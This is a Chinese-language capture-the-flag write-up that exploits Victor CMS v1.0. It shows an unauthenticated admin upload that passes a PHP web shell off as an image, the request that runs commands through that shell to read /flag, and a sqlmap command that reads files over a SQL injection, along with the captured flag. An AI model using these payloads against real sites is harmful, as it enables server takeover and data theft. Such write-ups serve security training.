简介
Victor CMS v1.0 存在二次注入漏洞和任意文件上传漏洞
任意文件上传
点击Admin,不用登录,直接进入,存在未授权访问
进入之后点击Users——>Add Users,只允许上传图片,上传抓包,更改后缀
注意:这里只允许上传权限马,普通的一句话上传是没有flag的。
抓包数据如下
POST /admin/users.php?source=add_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------401783054033296637582138189447
Content-Length: 1138
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/users.php?source=add_user
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_name"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_firstname"
1223
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_lastname"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_image"; filename="minglingzhixing.php"
Content-Type: image/jpeg
GIF89a
<?php system($_GET[1]);phpinfo();?>
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_role"
Admin
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_email"
[email protected]
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_password"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="create_user"
Add User
-----------------------------401783054033296637582138189447--
放包,直接获取flag
http://xxx/img/minglingzhixing.php?1=cat%20/flag
获取flag{71b2ac87-ae17-41af-8496-fd35a2ee5ad5}
二次注入
漏洞原理:二次注入漏洞的原理在于,Web应用程序在某个阶段(通常是数据存储或处理阶段)没有充分地验证、过滤或转义用户输入,然后将该输入存储到数据库、文件或其他存储设备中。然后,在后续的请求或操作中,应用程序再次使用了这个未经验证的用户输入,从而可能导致攻击者执行恶意操作。
位置在Categories处
直接在登陆框添加然后抓包
抓包数据如下
POST /admin/categories.php HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/categories.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
cat_title=13123123&submit=
直接丢入sqlmap爆库
发现不存在flag,换个思路,直接读取
python sqlmap.py -r ceshi.txt --file-read "/flag" --dbms Mysql
文章评论